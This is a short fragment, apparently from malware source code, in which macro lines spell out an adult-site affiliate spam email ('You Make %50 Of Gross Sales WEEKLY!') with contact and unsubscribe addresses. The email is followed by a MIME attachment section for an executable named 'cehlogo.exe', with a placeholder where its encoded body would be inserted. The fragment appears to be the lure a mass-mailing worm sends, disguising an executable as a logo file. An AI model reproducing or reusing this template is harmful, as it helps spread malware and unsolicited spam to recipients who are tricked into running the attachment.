MESSAGETEXT World Leader In Beautiful Hardcore Porn!
MESSAGETEXT You Make %50 Of Gross Sales WEEKLY!
MESSAGETEXT One $400.00 Order Gets You $200.00!
MESSAGETEXT <space>
MESSAGETEXT Get Busy Webmasters....CEN Has $$$$$
MESSAGETEXT Set Aside Just For You!
MESSAGETEXT Join The 12,000 Webmaster Earning
MESSAGETEXT Huge WEEKLY PayChecks!
MESSAGETEXT <space>
MESSAGETEXT If you have any questions, please contact joee@powersite.net
MESSAGETEXT <space>
MESSAGETEXT <space>
MESSAGETEXT ---------------------------------------------------------------------
MESSAGETEXT To unsubscribe, e-mail: trafficcash-unsubscribe@mail.vixxens.com
MESSAGETEXT Your address will then be removed automatically from this list.
MESSAGETEXT <space>
MESSAGETEXT ------------DB11958BB342E7
MESSAGETEXT Content-Type: application/x-msdownload; name="cehlogo.exe"
MESSAGETEXT Content-Transfer-Encoding: base64
MESSAGETEXT Content-Disposition: attachment; filename="cehlogo.exe"
MESSAGETEXT <space>
MESSAGETEXT <mimeeps>
MESSAGETEXT ------------DB11958BB342E7--
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
]]>